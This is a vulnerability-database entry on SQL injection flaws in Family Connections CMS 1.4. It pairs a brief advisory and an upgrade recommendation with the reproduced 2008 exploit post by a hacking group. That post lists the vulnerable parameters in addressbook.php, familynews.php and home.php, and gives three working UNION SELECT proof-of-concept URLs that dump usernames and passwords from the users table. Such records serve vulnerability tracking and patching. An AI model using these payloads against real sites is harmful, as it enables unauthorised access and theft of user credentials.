Family Connections CMS 1.4 Multiple Remote SQL Injection Vulnerabilities

vendor:

Family Connections CMS

by:

CWH Underground

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Family Connections CMS

Affected Version From: 1.4

Affected Version To: 1.4

Patch Exists: YES

Related CWE: N/A

CPE: a:family_connections:family_connections_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Family Connections CMS 1.4 Multiple Remote SQL Injection Vulnerabilities

Family Connections CMS version 1.4 is vulnerable to multiple remote SQL injection vulnerabilities. An attacker can exploit these vulnerabilities to gain access to sensitive information such as usernames and passwords. The vulnerabilities exist in the addressbook.php, familynews.php and home.php scripts. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable scripts to exploit these vulnerabilities.

Mitigation:

Upgrade to the latest version of Family Connections CMS and apply the latest security patches.

Source

Exploit-DB raw data:

==========================================================================
 Family Connections CMS 1.4 Multiple Remote SQL Injection Vulnerabilities
==========================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE : 14 June 2008
SITE : www.citec.us


#####################################################
APPLICATION : Family Connections CMS
VERSION     : 1.4
DOWNLOAD    : http://downloads.sourceforge.net/fam-connections
#####################################################

+++ Multiple Remote SQL Injection Exploit +++

    First you must register for access to user section then SQL Injection Exploit !!!

----------
 Exploits
----------
[+] /addressbook.php?address=<SQL Injection>
[+] /familynews.php?getnews=<SQL Injection>&newsid=2
[+] /home.php?action=results&poll_id=<SQL Injection>

--------------
 POC Exploits
--------------
[+] http://192.168.24.25/fcms/addressbook.php?address=1/**/UNION/**/SELECT/**/1,2,password,username,5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/fcms_users
[+] http://192.168.24.25/fcms/familynews.php?getnews=-9999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19/**/FROM/**/fcms_users&newsid=2
[+] http://192.168.24.15/fcms/home.php?action=results&poll_id=-9999/**/UNION/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/fcms_users--


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-14]